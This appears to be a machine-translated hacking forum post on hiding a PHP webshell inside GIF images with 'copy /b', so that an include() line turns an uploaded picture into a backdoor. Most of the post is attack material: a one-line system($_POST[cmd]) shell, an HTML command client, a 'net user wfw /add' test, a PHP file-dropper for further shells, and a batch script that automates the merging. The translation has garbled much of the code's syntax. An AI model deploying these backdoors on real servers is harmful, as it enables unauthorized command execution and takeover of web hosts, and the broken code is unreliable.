New Method for webshell injection of images

Since the script hidden in the picture has been released (for friends who haven't read it, refer to the articles on Bugkidz), there are people who are constantly talking about programs that are hard to pull and images that cannot be generated. So yesterday I re-studied the principle. I suddenly thought that a new method is to use the copy command to merge images and scripts, but I still find that it is not feasible. The reason is unknown: After I merge images with copy, the structure of the image is damaged by me. If the image is placed on a webpage, it is simply a Red Cross. I was puzzled. I was posted to the Forum for advice and no one asked me. So I spent two hours in the evening and finally got a result ~~~
(Because I am a local test, and my Apache does not support Asp, the following are all php program injection (I only use php). In theory, asp is equally feasible, if anyone wishes to help me, please try it. thank you first ~~~)
First, let's see how I did it:

C:> copy 1.gif+ 2.php 3.gif

The idea is to combine 1.gif and 2.php to generate a new file named 3.gif. 2. php is a phpshell file written by myself (closed in safe mode). The Code is as follows:

<? $ Cmd = $ _ POST [cmd]; @ system ($ cmd);?>

Then add the following sentence to a wfw. php:

<? Include ("3.gif");?>

/B refers to processing all the files to be spliced as non-text files. If this parameter is not included, the system automatically determines that both files are text files, and text files are usually named 1A as the end mark, therefore, when splicing two text files, the system removes all the characters (including 1A) after the previous text file 1A to ensure that the new file is normal. This explains why the image generated using the copy command is invisible, because as long as there are 1A characters in the image, the subsequent characters will be removed.
After understanding this, the subsequent steps will be smooth sailing. Create an html form for local POST parameter submission:

<Html>
<Head>
& Nbsp; <title> image hiding script Backdoor client </title>
</Head>
<Body>
<Center> <font size = 3 color = #555555 class = fonts> <B> image hiding script Backdoor client </B> </font> <br> By myself <br> (command execution function) <br>

<Form method = "post" action = "http: // localhost/wfw. php" enctype = "multipart/form-data">
<Input type = text name = "cmd" value = "" size = 20>
<Input type = submit name = "submit" value = "">
<Br> [enter the system command or program. Enter the specific path for executing the program 〗
</Form>
</Center>
</Body>
</Html>

In the above action, because I tested it locally, I entered localhost. In specific, I want to change it to the URL of the file inserted with include.
Open the form and input the following in the command:

Net user wfw/add

The page jumps to wfw. php. unexpectedly, the image is completely displayed, but the command response that should have been displayed is not displayed. So I checked my machine to see if the command was complete:

C:> net user

The result is successful.

Conclusion: after a period of exploration and efforts, I finally succeeded in completing this method. Is it very easy? You do not need to download the image and process it with the program of the smelly meal before uploading it. It can be easily done in Webshell. The inserted script may not be my script (it's too simple to display it again, I don't know why, I hope someone can help me solve it). It can be like this: you can also save the POST data directly as another phpshell (or aspshell ~~ (It is best to add a secret before insertion)

The following is a php script that generates a user-defined file in the image position. I will not write the form, just change the above form slightly:

<?
If ($ _ POST [create])
{
If (! Is_writeable (str_replace (,/, dirname (_ FILE __)))){
& Nbsp; exit;
& Nbsp;} else {
& Nbsp; if (file_exists ($ _ POST [filename]) {
& Nbsp; exit;
& Nbsp;} else {
& Nbsp; $ fp = @ fopen ("". $ _ POST [filename]. "", "wb ");
& Nbsp; $ content =$ _ POST [filedate];
& Nbsp; $ fw = @ fwrite ($ fp, $ content );
& Nbsp; @ fclose ($ fp );
& Nbsp ;}
}
?>

Because it is executed using the cmd command, I will write a batch processing program, which serves the same purpose as the program to be prepared. Actually, this is just for everyone to remember me. If you don't want to use a batch processing program, you can simply enter the statement on goto end under start.

@ Echo off
Echo.
Echo & nbsp; **********************************
Echo & nbsp; script backdoor injection image program By me not
Echo & nbsp; mail: wofeiwo1987@yahoo.com.cn
Echo & nbsp; QQ: 309088292
Echo & nbsp; **********************************
Echo & nbsp; Usage: % 0 ^ <image file ^> ^ <script file ^> ^ <generate file ^>
Echo & nbsp; Eg: % 0 1.gif 2.php 3.gif
Echo.
If % 1 = goto err
If % 2 = goto err
If % 3 = goto err
: Start
Echo & nbsp; Start .......
Copy/B % 1 + % 2% 3
If not % ERRORLEVEL % = 0 goto err
Echo & nbsp; the image is generated successfully!
Goto end
: Err
Echo & nbsp; image generation fails. Check whether the parameters are correct!
: End
Echo.

Ps: in other words, when I upload the image, it may not be a GIF file, it may also be in the format of .bmp .png.jpg. The effect is the same!